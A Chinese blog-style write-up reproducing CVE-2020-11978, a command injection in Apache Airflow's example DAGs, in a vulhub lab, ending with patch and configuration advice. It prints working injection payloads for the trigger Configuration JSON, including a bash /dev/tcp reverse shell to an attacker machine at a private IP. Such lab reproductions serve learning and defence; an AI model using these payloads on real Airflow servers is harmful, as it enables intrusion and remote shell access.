CVE-2020-11978 Apache Airflow 示例dag中的命令注入漏洞复现

目录

一、漏洞信息

二、环境搭建

三、复现过程

1.测试漏洞

2.利用漏洞反弹shell

四、修复建议


一、漏洞信息

漏洞名称APACHE AIRFLOW 示例DAG中的命令注入漏洞
漏洞编号CVE-2020-11978
危害等级中危
CVSS评分6.5
漏洞厂商Apache
受影响版本Apache Airflow <= 1.10.10
漏洞概述Apache Airflow是美国阿帕奇(Apache)软件基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。 Apache Airflow 1.10.10及之前版本中的 example DAGs存在操作系统命令注入漏洞。攻击者可利用该漏洞运行任意命令。

二、环境搭建

使用vulhub提供的镜像容器进行靶场搭建:

docker-compose run airflow-init #初始化数据库

docker-compose up -d #启动靶场环境

访问http://your-ip:8080可进入airflow管理端

三、复现过程

1.测试漏洞

在服务器端创建文件

1.1访问airflow管理端后,先将example_trigger_target_dag前的Off改为On,并进入:

1.2在Configuration JSON中输入{"message":"'";touch /tmp/whats_up_success;#"},在tmp文件内创建whats_up_success,点击Trigger执行:

1.3等待一段时间后可以看到该命令成功执行:

1.4在服务端进入容器查看结果,成功:

2.利用漏洞反弹shell

2.1先在攻击机kali(192.168.92.130)上开启nc反监听,设置端口6666:

2.2再在Configuration JSON中输入{"message":"'";bash -i >& /dev/tcp/192.168.92.130/6666 0>&1;#"}并执行

2.3一段时间后观察到已成功执行:

2.4回到130kali上查看结果,成功:

四、修复建议

1、请及时升级至1.10.10版本以上,可从官网获取。

2、删除或禁用默认DAG(删除或在配置文件中禁用默认DAGload_examples=False)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值